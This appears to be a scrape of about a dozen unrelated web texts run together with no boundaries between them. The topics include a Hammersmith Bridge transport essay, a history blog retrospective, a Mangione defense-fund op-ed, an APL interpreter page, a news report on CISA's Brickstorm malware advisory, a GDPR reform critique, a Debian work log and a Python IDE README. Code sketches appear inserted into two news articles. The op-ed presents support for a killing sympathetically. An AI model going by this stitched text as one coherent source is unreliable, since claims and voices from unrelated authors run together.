Would the pods risk obsolescence? After all, a restored bridge might serve for decades while autonomous technology is evolving rapidly. But in a rapidly changing transport landscape, the pods deliver adaptable infrastructure with manageable operating costs. Vehicles can be upgraded as technology improves at minimal cost and could be operated publicly like TfL services or through private concession with access leasing and passenger charges. In any case, the pods cost a fraction of the £250m restoration which would likely require perpetual subsidy for changing traffic patterns.
Barriers to implementation exist, but none are insurmountable. The Automated Vehicles Act 2024 already provides a legal framework, while Milton Keynes and Solihull already operate these exact Ohmio vehicles on public roads. The most likely bridge-specific challenges, such as weight certification, vibration testing and structural approval, are procedural requirements, not engineering barriers.
This proposal solves the actual mobility problems faced by local communities rather than restoring a traffic pattern that was already causing gridlock.
Here is the digital visualisation of the proposal (no sound):
What happened to this proposal?
The Centre for Connected and Autonomous Vehicles offered £200,000 for feasibility studies. Possible assembled a consortium including Ohmio, City Science, and City Infinity. Richmond Council and TfL both agreed to support if Hammersmith & Fulham agreed.
Hammersmith & Fulham refused to engage. The deadline passed. The consortium disbanded.
Since then, Ohmio has begun trials in Solihull and Milton Keynes . Waymo and Wayve will trial autonomous taxi services in London in 2026.
The opportunity for the UK’s first autonomous public transport deployment was lost, but the solution remains viable.
What needs to happen now?
End the pretence. LBHF, TfL and DfT must publicly acknowledge what everyone privately knows : the restoration (£250m+) is unfunded and any replacement (£150m+) is equally unfundable.
Open a competitive tender. Tender for public transport solutions within the stabilised bridge’s 3-tonne weight limit. Offer clear requirements: passengers per hour, Oyster-integrated, delivery timeline. Let the market find the most cost-effective solution. Fast-track regulatory approval for the winning proposal. No multi-year planning inquiries for a bridge that’s already been closed for six years.
Create the destination, invest in the approaches. All three bodies also need to invest in regenerating areas at either end: the retail outlets, cycling infrastructure, public realm upgrades, drainage improvements (co-ordinated with the Hammersmith Flyover redevelopment if that proceeds).
Recently, there have been some more positive signs. Various local politicians have begun to more clearly express support for prioritising a public transport solution over simply re-introducing cars. LBHF recently trialled yellow rental carts, demonstrating an appetite for testing new modes of transport.
The Possible proposal would have been the UK’s first autonomous vehicle deployment in real-world public transport.
Hammersmith Bridge offers the perfect testing ground: dedicated straight lanes, low speed, controlled environment. The Government has stated its ambition for technology leadership in autonomous vehicles.
That opportunity was lost when LBHF refused to engage, but the solution remains viable.
The bridge is stabilised. The community has adapted. The technology exists. What’s required is simply the political will to choose the future.
Hammersmith Bridge could become a place where Victorian ironwork frames cutting-edge technology. London’s greenest historic crossing could be the testing ground for Britain’s most advanced public transport solution.
Picture it at dusk: Victorian lampposts glowing, pods gliding silently past, cyclists heading home, the swans gliding along the Thames below. The bridge would no longer be a bottleneck that motorists endure, but a bridge people choose to cross.
Designed thoughtfully, Hammersmith Bridge’s public transport vehicles could become a timeless and recognisable feature of London’s urban landscape, alongside other distinctive British icons — red telephone boxes, double-decker buses, or black cabs.
That’s the future for Britain that we should be building - one that is even more beautiful than the past we’re failing to resurrect.
Hammersmith Bridge can be one of the greatest river crossings in the world.
Please do get in touch if you are in a position to help solve this challenge or have any feedback.
Let’s build the future.
Will this solution help us solve the vast problem of Britain’s state crisis?
Of course not. 42
But Hammersmith Bridge teaches a lesson.
Here, the intuitive question based on past assumptions was “how do we restore full vehicular capacity?” The real question we should have been asking ourselves is “how do we solve this mobility problem to ensure a better future?”
While we debate how to restore Victorian infrastructure for outdated traffic patterns, the actual future, autonomous and mass public transport, is materialising around us.
In that sense, Hammersmith Bridge serves as a warning.
If we can’t adapt our thinking here, what hope is there for the toughest problems that we face? For the infrastructure that Britain actually needs to build? For the critical state capacity that we most urgently need to develop? 43
Hammersmith Bridge is the case study; now Britain must start asking the right questions.
This essay was possible because kind people cared enough to help.
Above all, I would like to thank Leo Murray, who led the charity Possible and wrote a definitive report on Hammersmith Bridge which informed so much of this piece.
Tom Pike, Tim Lennon, and Charles Campion generously shared their expertise, data, and years of work on this problem. Their rigorous research and genuine commitment to solving the bridge’s crisis made this analysis possible.
The Looking for Growth team , Lawrence, Ludo, and Jack, provided invaluable support and encouragement throughout.
I am deeply grateful also to friends Quentin, Aeron, Paramvir, Bob and Jemima, who read early drafts and offered thoughtful feedback.
Finally, my most sincere apologies to every friend, family member, and innocent bystander who endured my monologues about Hammersmith Bridge these past months.
Disclaimer : All posts on this site reflect my personal views only and should not be construed as investment, financial, or professional advice. These views do not represent my employer or any affiliated organisation.
Possible & Leo Murray (2024) Hammersmith Bridge Report
Tim Lennon (2024) Hammersmith Bridge
Barnes Community Association & Emma Robinson (2020) The Impact of the Closure
LBHF Resources:
LBHF (2025) Hammersmith Bridge
LBHF (2024) Stabilisation Works
LBHF (2020) Hammersmith Bridge Timeline
I was 25 years old when I started writing the blog version of Res Obscura, which ran from 2010 to 2023 (and still exists here ). This was the early summer of 2010. I was a second-year PhD student in history, living with two roommates in a 1920s bungalow on the east side of Austin.
And I was very dedicated to the idea that you should aim to write a new blog post every day.
This is a concept that the 40-year-old version of me, with two young kids and zero free time, cannot even begin to fathom.
It’s also a practice of the old internet that simply doesn’t exist anymore — one of many digital behaviors that was swallowed up by social media. That whole world of blogging (exploratory, low-stakes, conversational, and assuming a readership of people who had bookmarked your URL and who read it on a desktop or laptop computer) is almost entirely gone now.
My first two years writing Res Obscura in its blog format were great fun. I began to develop an intellectual community, forming contacts with, for instance, the wonderful Public Domain Review (founded 2011 and still going strong). I linked to and was linked to by a range of other history bloggers whom I saw as kindred spirits, some of whom seem to have disappeared ( BibliOdyssey ), while others have become well-known writers ( Lindsey Fitzharris ).
It was pretty addictive when a post went viral. In those halcyon days when written blog posts about obscure historical subjects were viable sources of viral content, you could end up getting covered in international media for, say, discovering a cat’s paw prints on a 15th century Croatian manuscript.
That spike in readership around 2018 was partially from a post about 17th century food that, unexpectedly, led to me speaking about snail water on New Zealand public radio .
But by then, I was starting to move on. I was hard at work on my first book — the book I needed to write for tenure — and was becoming a bit dispirited by the increasingly click-bait nature of blogging, not to mention the tendency of social media to elevate toxic behavior and controversy over lovely and fascinating but totally uncontroversial things like the Croatian cat paw prints.
I also (then and now) have no appetite for short-form video content, and still less for the type of history explainer videos — “here’s a two hour deep dive into why this movie is historically inaccurate” or “everything you need to know about such-and-such famous person” — that seem to do well on YouTube.
Switching over to a Substack newsletter, in the summer of 2023 , revived my interest in writing online. It felt like rejoining an intellectual community — not quite the same as the golden age of blogging in the 2000s, but something equally as lively, in a way that I don’t think quite gets enough credit in the 2020s.
From Weird Medieval Guys to Noted to the Fernando Pessoa-esque The Hinternet and the newsletters of well-known historians like David Bell ( French Reflections ), as well as the more general-audience or politically oriented newsletters that still dig deep into historical topics (like Unpopular Front and others), I would say that Substack is now the most interesting place online for discussions not just of history, but of humanistic topics as a whole.
Needless to say, there’s also a ton of people writing about the intersection of AI, technology and contemporary society (of which I would single out AI Log and Ethan Mollick’s One Useful Thing , among others).
So why have I kept writing Res Obscura through all the changes of the world — and of my own life and interests — since the summer of 2010? Simple: I love sharing things I find interesting, especially things which are not available elsewhere online. Most of my posts are written because I search for information on something and don’t find it.
The niche nature of Res Obscura (from 17th century cocaine to Kinetoscopes to Henry James: the RPG ) is precisely why I enjoy writing it.
I am deeply grateful that 15 years and 8,300 subscribers later, I have a place online where I can share idiosyncratic knowledge and writing with an equally idiosyncratic group of readers.
Now here’s the inevitable part where I ask if you would be willing to support my continued work. To that end, I have set up a special holiday discount valid until the end of December. Thank you for reading!
A detail of a trompe-l’œil “dome” by the Renaissance painter Andrea Mantegna , Camera degli Sposi, Ducal Palace, Mantua, Italy. Featured in a 2011 Res Obscura post called “ The Art of Fooling the Eye .”
Sam Beard is a spokesperson for the December 4 Legal Committee, whose book Depose: Luigi Mangione and the Right to Health is available for pre-order at illwilleditions.com.
Luigi Mangione’s legal defense fund has swelled to more than $1.3 million and is still growing daily. As the December 4 Legal Committee, we created that fund — but it would mean nothing without the donations, prayers, and support of people from around the world. As corporate social media platforms censored support for Luigi , the fundraiser page became a place for people to share stories of senseless death and suffering at the hands of the for-profit health insurance industry in this country.
There is a deep irony in the widespread support for Luigi. People celebrate an alleged murderer not because they hate reasonable debate or lust for political violence, but out of respect for themselves and love for others. Across the political spectrum, Americans experience the corporate bureaucracies of our health care system as cruel, exploitative, and maddening. They feel powerless in the face of the unnecessary dehumanization, death, and financial ruin of their neighbors and loved ones.
One year ago, the December 4 killing of United Healthcare CEO Brian Thompson temporarily suspended the usually intractable left vs. right polarization of America. Ben Shapiro’s audience revolted when he accused Luigi supporters of being “evil leftists.” Donors to Luigi’s fund come from across the political spectrum, and a common theme among them is their acute realization that the political differences of the culture war are largely manufactured to benefit the powerful. This was a crucial difference between Mangione’s alleged act and, for example, the assassination of Charlie Kirk . While the latter intensified existing political divides , the former seemed to strike upon the common ground of a different political landscape: from red vs. blue, or left vs. right, to down vs. up .
But a year on, it is clear that even bipartisan public support for killing a health care CEO on the street and the endless stories of suffering and death as a result of insurance claim denials are not enough to depose the for-profit health care system. Today, Medicare for All looks even more politically unrealistic than when Bernie Sanders made it the centerpiece of his presidential campaign.
This fact poses a challenge for Luigi’s supporters: Will his alleged act be remembered as nothing more than a salacious contribution to the true crime genre? Will we settle for him being installed as an edgy icon of celebrity culture, used to market fast-fashion brands and who knows what next?
We do not think his supporters, or anyone else who believes that health care is a human right, should accept that. But what would it take to make the events of last December 4 into a movement to build a more humane health care system in America?
The time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.
For the last year, we have been asking this question of medical professionals, community organizers, scholars, and ourselves.
In our forthcoming book , “Depose: Luigi Mangione and the Right to Health,” we offer the beginnings of an answer: The history of the struggle for the right to health in America shows that it is indeed politically unrealistic to expect politicians to deliver it from above — but our own dignity and intelligence demands that this right be asserted by all of us from below. The widespread support for Luigi shows that the time has come for the long struggle for the right to health care to make a strategic shift from protest to political direct action.
Consider the sit-in movements to end Jim Crow laws and desegregate American cities. These were protests, insofar as participants drew attention to unjust laws — but they were also political direct actions. Organizers were collectively breaking those laws, and in doing so, were enacting desegregation . Activists organized themselves to support and protect each other in collectively nullifying laws that had no moral authority and, in the process, acted as if they were already free. This is what we mean by a shift from protest to direct action.
Less well known is the role of direct action in winning the eight-hour workday . For half a century, industrial workers had been struggling to shorten their hours so they could have some rest and joy in their lives. One decisive moment in this struggle came in 1884, when the American Federation of Labor resolved that two years later, on May 1, their workers would enact the eight-hour day. After eight hours, they would go on strike and walk off the job together. They called on other unions around the country to do the same and a number did — including in Chicago, where police deployed political violence to attack striking workers, killing two. While this action did not immediately win the struggle everywhere, it began to normalize the eight-hour day and raised the bar for workplaces everywhere to eventually follow. The key is that this could only happen when workers stopped demanding something politically unrealistic and started changing political reality themselves.
The struggle for the right to health care has been ongoing in the United States for at least a century. At every turn, it has been thwarted by industry lobbyists and the politicians they control . But what would it look like to strategically shift the struggle for the right to health care in the U.S.? How would health care providers go on strike or engage in direct action without harming patients?
We found the beginning of an answer from Dr. Michael Fine, who has called on his fellow physicians to organize for a different kind of strike: not halting all their labor, but stopping the aspects of their work that are unrelated to their responsibility as healers. Fine writes, “We need to refuse, together, to use the electronic medical records until they change the software so that those computers free us to look at and listen to patients instead of looking at and listening to computer screens.”
All of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.
A strike by health care workers could mean not the cessation of care, but liberating this critical work from the restraints imposed by profit-seeking companies . Beginning from this idea, all of us could organize to free the labor of health care from the corporate bureaucracies that act as parasites on the relationship between caregiver and patient.
If we step outside of our usual political bubbles and into a direct action movement to assert the universal right to health care, we might find that the common ground that Luigi’s alleged actions exposed is the precise point from which the wider political landscape may be remade.
This is the website for APL9, which is an APL implementation written in C on and for Plan 9 (9front specifically, but the other versions should work as well).
Work started in January 2022, when I wanted to do some APL programming on 9front, but no implementation existed. The focus has been on adding features and behaving (on most points) like Dyalog APL . Speed is poor, since many primitives are implemented in terms of each other, which is not optimal, but it helped me implement things more easily.
Note: development is still very much on-going. Some primitives may be implemented wrong at this point, since it can be hard to implement them without ever having used them ☺.
For more information, see Implementation Status .
⍺⍺ is changed to ⍶
⍵⍵ is changed to ⍹
∘. is changed to ⌾
∇∇ is changed to ∆ and ⍙ for monadic and dyadic operators respectively
Installation is as simple as cloning and running mk.
git/clone https://git.sr.ht/~pmikkelsen/APL9
cd APL9
mk
% set the BIN environment variable if
% you don't want it to install globally
mk install
The resulting binary is installed as apl. At the time of writing, it doesn't take command line arguments (apart from -t and -m for debugging).
Remember to use a font that can display the glyphs! To be able to write the apl glyphs, a small script is provided with the name aplkeys, which works on 9front. Usage is as follows:
% Say my normal kbmap is called dk, but I want to be able to write APL symbols
aplkeys dk
The layout is mostly the same as the one on X11 on Linux, but the way to access the symbols is different. In order to get the "normal" layer, such as ⍺⍳⍵∊* and so on, hold down Mod4 (the windows key) while typing (in this case, typing aiwep). To access the other layer, hold down Mod4 and Alt-Gr at the same time, to get ⍶⍸⍹⍷⍣ and so on. Please email me if you have questions about this.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned network defenders of Chinese hackers backdooring VMware vSphere servers with Brickstorm malware.
In a joint malware analysis report with the National Security Agency (NSA) and Canada's Cyber Security Centre, CISA says it analyzed eight Brickstorm malware samples.
These samples were discovered on networks belonging to victim organizations, where the attackers specifically targeted VMware vSphere servers, creating hidden rogue virtual machines to evade detection and stealing cloned virtual machine snapshots for further credential theft.
As noted in the advisory, Brickstorm uses multiple layers of encryption, including HTTPS, WebSockets, and nested TLS to secure communication channels, a SOCKS proxy for tunneling and lateral movement within compromised networks, and DNS-over-HTTPS (DoH) for added concealment. To maintain persistence, Brickstorm also includes a self-monitoring function that automatically reinstalls or restarts the malware if interrupted.
While investigating one of the incidents, CISA found that Chinese hackers compromised a web server in an organization's demilitarized zone (DMZ) in April 2024, then moved laterally to an internal VMware vCenter server and deployed malware.
The attackers also hacked two domain controllers on the victim's network and exported cryptographic keys after compromising an Active Directory Federation Services (ADFS) server. The Brickstorm implant allowed them to maintain access to the breached systems from at least April 2024 through September 2025.
After obtaining system access, they've also been observed capturing Active Directory database information and performing system backups to steal legitimate credentials and other sensitive data.
To detect the attackers' presence on their networks and block potential attacks, CISA advises defenders (especially those working for critical infrastructure and government organizations) to scan for Brickstorm backdoor activity using agency-created YARA and Sigma rules, and block unauthorized DNS-over-HTTPS providers and external traffic.
They should also take inventory of all network edge devices to monitor for suspicious activity and segment the network to restrict traffic from demilitarized zones to internal networks.
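For defenders who want to automate that scanning step, here is a minimal sketch using the yara-python package. The rule file name and scan path are hypothetical placeholders; the rules themselves would be the ones distributed with the advisory, not anything shown here.

```python
# Minimal sketch: apply downloaded YARA rules to files on a suspect host.
# Assumes the yara-python package is installed and that "brickstorm.yar"
# holds the advisory's published rules (file names/paths are hypothetical).
import os
import yara

rules = yara.compile(filepath="brickstorm.yar")

def scan_tree(root):
    """Yield (path, matching rule names) for every file that hits any rule."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                matches = rules.match(path)
            except yara.Error:
                continue  # unreadable or oversized file; skip it
            if matches:
                yield path, [m.rule for m in matches]

for path, hits in scan_tree("/var/www"):
    print(path, hits)
```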
"CISA, NSA, and Cyber Centre urge organizations to use the indicators of compromise (IOCs) and detection signatures in this Malware Analysis Report to identify BRICKSTORM malware samples," the joint advisory urges. "If BRICKSTORM, similar malware, or potentially related activity is detected, CISA and NSA urge organizations to report the activity as required by law and applicable policies."
Today, cybersecurity firm CrowdStrike also linked Brickstorm malware attacks targeting VMware vCenter servers on the networks of U.S. legal, technology, and manufacturing companies throughout 2025 to a Chinese hacking group it tracks as Warp Panda. CrowdStrike observed the same threat group deploying previously unknown Junction and GuestConduit malware implants in VMware ESXi environments.
The joint advisory comes on the heels of a Google Threat Intelligence Group (GTIG) report published in September that described how suspected Chinese hackers used the Brickstorm malware (first documented by Google subsidiary Mandiant in April 2024 ) to gain long-term persistence on the networks of multiple U.S. organizations in the technology and legal sectors.
Google security researchers linked these attacks to the UNC5221 malicious activity cluster, known for exploiting Ivanti zero-days to target government agencies with custom Spawnant and Zipline malware.
Brooklyn-based DJ and immigrant rights and climate activist Thanushka Yakupitiyage , better known as DJ Ushka, builds alternate realities with sets that mix Bollywood and baile funk, bachata, and Shakira.
She performed at this summer's Planet Brooklyn with a soundsystem , a loudspeaker conglomeration that can be heard throughout an entire street party. The practice originated in Kingston, Jamaica, and is typically associated with dancehall and other Caribbean styles of music. (You'll see a lot of them at the West Indian Day Parade .) She told me that the one she used was built by her friend, the musician Anik Khan , in Bangladesh's capital, Dhaka.
Yakupitiyage, who currently works on sustainable policy initiatives at the Surdna Foundation, said she started DJing to be part of the queer people of color in New York who were finding community on the dance floor.
"In 2011, I came into DJing when I was doing immigrant and refugee rights work," Yakupitiyage told me. She is an immigrant herself, originally from Sri Lanka and Thailand, who moved to the U.S. when she was 18 to attend college in Massachusetts. After graduating in 2007, she moved to New York City. "As an immigrant, I've experienced all of the difficulties of what it means to be able to stay in and make New York my home."
As she worked on immigrant support campaigns in the city, she began to see the club as a place of refuge: "I joke that some people go to church or temple, I go to the club."
She quickly realized that while the New York club scene of the 2010s had a dearth of women of color, immigrants, and queer people, that was changing fast. Party producers "with a sort of political analysis based on the issues that I was working on" were popping up, fulfilling, as she put it, "the need for joyful spaces when we live in a really chaotic time."
She cut her teeth at parties like QUE BAJO!? by DJs Uproot Andy and Geko Jones, and queer parties like Azucar; SWEAT, a party run by Khane Kutzwell ; and, eventually Papi Juice, whose organizers she says are now "like family."
Since Yakupitiyage has been working as a multi-disciplinary artist on projects and parties for more than a decade, I asked her what her wildest dreams were for a new era of New York City culture .
"It's very, very difficult to be a full-time artist or DJ in New York," Yakupitiyage said. "I'd like to see the City really think about how they can create opportunities, expand grant opportunities for artists, and incorporate nightlife cultural workers as a part of broader artistic endeavors."
Here's where the DJ who can do it all is partying in the next two weeks:
The European Commission (EC) is considering a “Digital Omnibus” package that would substantially rewrite EU privacy law, particularly the landmark General Data Protection Regulation (GDPR). It’s not a done deal, and it shouldn’t be.
The GDPR is the most comprehensive model for privacy legislation around the world. While it is far from perfect and suffers from uneven enforcement, complexities and certain administrative burdens, the omnibus package is full of bad and confusing ideas that, on balance, will significantly weaken privacy protections for users in the name of cutting red tape. It contains at least one good idea: improving consent rules so users can automatically set consent preferences that will apply across all sites. But much as we love limiting cookie fatigue, it’s not worth the price users will pay if the rest of the proposal is adopted.
The EC needs to go back to the drawing board if it wants to achieve the goal of simplifying EU regulations without gutting user privacy. Let’s break it down.
Changing What Constitutes Personal Data
The digital package is part of a larger Simplification Agenda to reduce compliance costs and administrative burdens for businesses, echoing the Draghi Report’s call to boost productivity and support innovation. Businesses have been complaining about GDPR red tape since its inception, and new rules are supposed to make compliance easier and turbocharge the development of AI in the EU. Simplification is framed as a precondition for firms to scale up in the EU, ironically targeting laws that were also argued to promote innovation in Europe. It might also stave off tariffs the U.S. has threatened to levy, thanks in part to heavy lobbying from Meta and tech lobbying groups.
The most striking proposal seeks to narrow the definition of personal data, the very basis of the GDPR. Today, information counts as personal data if someone can reasonably identify a person from it, whether directly or by combining it with other information.
The proposal jettisons this relatively simple test in favor of a variable one: whether data is “personal” depends on what a specific entity says it can reasonably do or is likely to do with it. This selectively restates part of a recent ruling by the EU Court of Justice but ignores the multiple other cases that have considered the issue.
This structural move toward entity-specific standards will create massive legal and practical confusion, as the same data could be treated as personal for some actors but not for others. It also creates a path for companies to avoid established GDPR obligations via operational restructuring to separate identifiers from other information—a change in paperwork rather than in actual identifiability. What’s more, it will be up to the Commission, a political executive body, to define what counts as unidentifiable pseudonymized data for certain entities.
Privileging AI
In the name of facilitating AI innovation, which often relies on large datasets in which sensitive data may residually appear, the digital package treats AI development as a “legitimate interest,” which gives AI companies a broad legal basis to process personal data, unless individuals actively object. The proposals gesture towards organisational and technical safeguards but leave companies broad discretion.
Another amendment would create a new exemption that allows even sensitive personal data to be used for AI systems under some circumstances. This is not a blanket permission: “organisational and technical measures” must be taken to avoid collecting or processing such data, and proportionate efforts must be taken to remove them from AI models or training sets where they appear. However, it is unclear what will count as appropriate or proportionate measures.
Taken together with the new personal data test, these AI privileges mean that core data protection rights, which are meant to apply uniformly, are likely to vary in practice depending on a company’s technological and commercial goals.
And it means that AI systems may be allowed to process sensitive data even though non-AI systems that could pose equal or lower risks are not allowed to handle it.
A Broad Reform Beyond the GDPR
There are additional adjustments, many of them troubling, such as changes to rules on automated decision-making (making it easier for companies to claim it’s needed for a service or contract), reduced transparency requirements (less explanation about how users’ data are used), and revised data access rights (supposed to tackle abusive requests). An extensive analysis by NGO noyb can be found here.
Moreover, the digital package reaches well beyond the GDPR, aiming to streamline Europe’s digital regulatory rulebook, including the e-Privacy Directive, cybersecurity rules, the AI Act and the Data Act. The Commission also launched “reality checks” of other core legislation, which suggests it is eyeing other mandates.
Browser Signals and Cookie Fatigue
There is one proposal in the Digital Omnibus that actually could simplify something important to users: requiring online interfaces to respect automated consent signals, allowing users to automatically reject consent across all websites instead of clicking through cookie popups on each. Cookie popups are often designed with “dark patterns” that make rejecting data sharing harder than accepting it. Automated signals can address cookie banner fatigue and make it easier for people to exercise their privacy rights.
While this proposal is a step forward, the devil is in the details:
First, the exact format of the automated consent signal will be determined by technical standards organizations where Big Tech companies have historically lobbied for standards that work in their favor. The amendments should therefore define minimum protections that cannot be weakened later.
Second, the provision takes the important step of requiring web browsers to make it easy for users to send this automated consent signal, so they can opt out without installing a browser add-on.
However, mobile operating systems are excluded from this latter requirement, which is a significant oversight. People deserve the same privacy rights on websites and mobile apps.
Finally, exempting media service providers altogether creates a loophole that lets them keep using tedious or deceptive banners to get consent for data sharing. A media service’s harvesting of user information on its website to track its customers is distinct from news gathering, which should be protected.
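For a sense of what honouring such a signal means in practice, here is a minimal server-side sketch. It is an illustration only: it uses Flask and the existing Global Privacy Control header (Sec-GPC) as a stand-in, since the Omnibus does not yet define the actual signal format.

```python
# Sketch of "respecting an automated consent signal" on the server side.
# The eventual EU signal format is undefined; the existing Global Privacy
# Control header (Sec-GPC) is used here purely as a stand-in.
from flask import Flask, request

app = Flask(__name__)

def opt_out_signalled() -> bool:
    # Treat an automated opt-out signal as a refusal of consent,
    # so no banner is shown and no tracking is loaded.
    return request.headers.get("Sec-GPC") == "1"

@app.route("/")
def index():
    if opt_out_signalled():
        return "Opt-out signal honoured: no tracking, no banner."
    # Only in this branch would a site run its consent flow / analytics.
    return "No automated signal received; consent flow applies."
```

The point is simply that a site receiving the signal can skip both the banner and the tracking, which is exactly the fatigue-reducing behaviour the proposal aims for.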
A Muddled Legal Landscape
The Commission’s use of the "Omnibus" process is meant to streamline lawmaking by bundling multiple changes. An earlier proposal kept the GDPR intact, focusing on easing the record-keeping obligation for smaller businesses—a far less contentious measure. The new digital package instead moves forward with thinner evidence than a substantive structural reform would require, violating basic Better Regulation principles, such as coherence and proportionality.
The result is the opposite of “simple.” The proposed delay of the high-risk requirements under the AI Act to late 2027—part of the omnibus package—illustrates this: Businesses will face a muddled legal landscape as they must comply with rules that may soon be paused and later revived again.
This sounds like "complification” rather than simplification.
The Digital Package Is Not a Done Deal
Evaluating existing legislation is part of a sensible legislative cycle, and clarifying and simplifying complex processes and practices is not a bad idea. Unfortunately, the digital package misses the mark by making processes even more complex, at the expense of personal data protection.
Simplification doesn't require tossing out digital rights. The EC should keep that in mind as it launches its reality check of core legislation such as the Digital Services Act and Digital Markets Act, where tidying up can too easily drift into a verschlimmbessern , the kind of well-meant fix that ends up resembling the infamous ecce homo restoration .
The students at America's elite universities are supposed to be the smartest, most promising young people in the country. And yet, shocking percentages of them are claiming academic accommodations designed for students with learning disabilities.
In an article published this week in The Atlantic, education reporter Rose Horowitch lays out some shocking numbers. At Brown and Harvard, 20 percent of undergraduate students are disabled. At Amherst College, that's 34 percent. At Stanford University, it's a galling 38 percent. Most of these students are claiming mental health conditions and learning disabilities, like anxiety, depression, and ADHD.
Obviously, something is off here. The idea that some of the most elite, selective universities in America—schools that require 99th percentile SATs and sterling essays—would be educating large numbers of genuinely learning disabled students is clearly bogus. A student with real cognitive struggles is much more likely to end up in community college, or not in higher education at all, right?
The professors Horowitch interviewed largely back up this theory. "You hear 'students with disabilities' and it's not kids in wheelchairs," one professor told Horowitch. "It's just not. It's rich kids getting extra time on tests." Talented students get to college, start struggling, and run for a diagnosis to avoid bad grades. Ironically, the very schools that cognitively challenged students are most likely to attend—community colleges—have far lower rates of disabled students, with only three to four percent of such students getting accommodations.
To be fair, some of the students receiving these accommodations do need them. But the current language of the Americans with Disabilities Act (ADA) allows students to get expansive accommodations with little more than a doctor's note.
While some students are no doubt seeking these accommodations as semi-conscious cheaters, I think most genuinely identify with the mental health condition they're using to get extra time on tests. Over the past few years, there's been a rising push to see mental health and neurodevelopmental conditions as not just a medical fact, but an identity marker. Will Lindstrom, the director of the Regents' Center for Learning Disorders at the University of Georgia, told Horowitch that he sees a growing number of students with this perspective. "It's almost like it's part of their identity," Lindstrom told her. "By the time we see them, they're convinced they have a neurodevelopmental disorder."
What's driving this trend? Well, the way conditions like ADHD, autism, and anxiety get talked about online—the place where most young people first learn about these conditions—is probably a contributing factor. Online creators tend to paint a very broad picture of the conditions they describe. A quick scroll of TikTok reveals creators labeling everything from always wearing headphones , to being bad at managing your time , to doodling in class as a sign that someone may have a diagnosable condition. According to these videos, who isn't disabled?
The result is a deeply distorted view of "normal." If ever struggling to focus or experiencing boredom is a sign you have ADHD, the implication is that a "normal," nondisabled person has essentially no problems. A "neurotypical" person, the thinking goes, can churn out a 15-page paper with no hint of procrastination, maintain perfect focus during a boring lecture, and never experience social anxiety or awkwardness. This view is buffeted by the current way many of these conditions are diagnosed. As Horowitch points out, when the latest issue of the DSM , the manual psychiatrists use to diagnose patients, was released in 2013, it significantly lowered the bar for an ADHD diagnosis. When the definition of these conditions is set so liberally, it's easy to imagine a highly intelligent Stanford student becoming convinced that any sign of academic struggle proves they're learning disabled, and any problems making friends are a sign they have autism.
Risk-aversion, too, seems like a compelling factor driving bright students to claim learning disabilities. Our nation's most promising students are also its least assured. So afraid of failure—of bad grades, of a poorly-received essay—they take any sign of struggle as a diagnosable condition. A few decades ago, a student who entered college and found the material harder to master and their time less easily managed than in high school would have been seen as relatively normal. Now, every time she picks up her phone, a barrage of influencers is clamoring to tell her this is a sign she has ADHD. Discomfort and difficulty are no longer perceived as typical parts of growing up.
In this context, it's easy to read the rise of academic accommodations among the nation's most intelligent students as yet another manifestation of the risk-aversion endemic in the striving children of the upper middle class. For most of the elite-college students who receive them, academic accommodations are a protection against failure and self-doubt. Unnecessary accommodations are a two-front form of cheating—they give you an unjust leg-up on your fellow students, but they also allow you to cheat yourself out of genuine intellectual growth. If you mask learning deficiencies with extra time on tests, soothe social anxiety by forgoing presentations, and neglect time management skills with deadline extensions, you might forge a path to better grades. But you'll also find yourself less capable of tackling the challenges of adult life.
My Debian contributions this month were all sponsored by Freexian. I had a bit less time than usual, because Freexian collaborators gathered in Marseille this month for our yearly sprint, doing some planning for next year.
You can also support my work directly via Liberapay or GitHub Sponsors .
I began preparing for the second stage of the GSS-API key exchange package split (some details have changed since that message). It seems that we’ll need to wait until Ubuntu 26.04 LTS has been released, but that’s close enough that it’s worth making sure we’re ready. This month I just did some packaging cleanups that would otherwise have been annoying to copy, such as removing support for direct upgrades from pre-bookworm. I’m considering some other package rearrangements to make the split easier to manage, but haven’t made any decisions here yet.
This also led me to start on a long-overdue bug triage pass, mainly consisting of applying usertags to lots of our open bugs to sort them by which program they apply to, and also closing a few that have been fixed, since some bugs will eventually need to be reassigned to GSS-API packages and it would be helpful to make them easier to find. At the time of writing, about 30% of the bug list remains to be categorized this way.
I upgraded these packages to new upstream versions:
I packaged django-pgtransaction and backported it to trixie, since we plan to use it in Debusine; and I adopted python-certifi for the Python team.
I fixed or helped to fix several other build/test failures:
I fixed a couple of other bugs:

PyTogether
Google docs for Python. A fully browser-based collaborative Python IDE with real-time editing, chat, and visualization.
When starting out in programming, many beginners find traditional IDEs overwhelming: full of plugins, extensions, configuration steps, paywalls, and complex UIs. PyTogether removes these barriers by offering a lightweight, distraction-free environment where you can focus on writing Python code right away.
The platform is designed for learning, teaching, and pair programming , making it ideal for classrooms, coding clubs, or quick collaborations.
Note: PyTogether is intended for educational purposes and beginner use. It is not optimized for large-scale production development.
While there are many online IDEs (Replit, Jupyter, Google Colab, etc.), PyTogether is built with a different goal: simplicity first .
Unlike production-grade IDEs, PyTogether prioritizes ease of use and collaboration for learners rather than advanced features.
Running PyTogether locally is a simple two-step process. Run the following commands from the project root:
# 1. Install all dependencies (automatically does it for root and frontend)
npm install

# 2. Start the servers
npm run dev
This will install all required packages, start the backend container, and launch the frontend. The initial launch should take around 2-5 minutes. The frontend will be live at http://localhost:5173 . Press CTRL+C to stop the program/containers.
Note: Two superusers are created automatically:
- Email: test1@gmail.com
- Email: test2@gmail.com
Both have the password testtest . You can log in with them on the frontend.
You may also adjust the settings in backend/backend/settings/dev.py
Jawad Rizvi
Applied Mathematics & Computer Engineering student at Queen's University.
by Ploum on 2025-12-04
In January 2025, I became aware that there was a real problem with Pixelfed, the “Instagram-inspired Fediverse client”, a problem that threatens the whole Fediverse. As Pixelfed was receiving a lot of media attention, I chose to wait. In March 2025, I decided that the situation had quieted down and wrote an email to Dansup, Pixelfed’s maintainer, with an early draft of this post. Dan replied promptly, in a friendly tone, but didn’t want to acknowledge the problem, which I have since confirmed many times with Pixelfed users. So I want to bring the debate into the open. If I’m wrong, I will at least understand why. If Dan is wrong on this very specific issue, we will at least have opened the debate.
This post will be shared to my Fediverse audience through my @ploum@mamot.fr Mastodon account. But Pixelfed users will not see it. Even if they follow me, even if many people they follow boost it. Instead, they will see a picture of my broken keyboard that I posted a week ago.
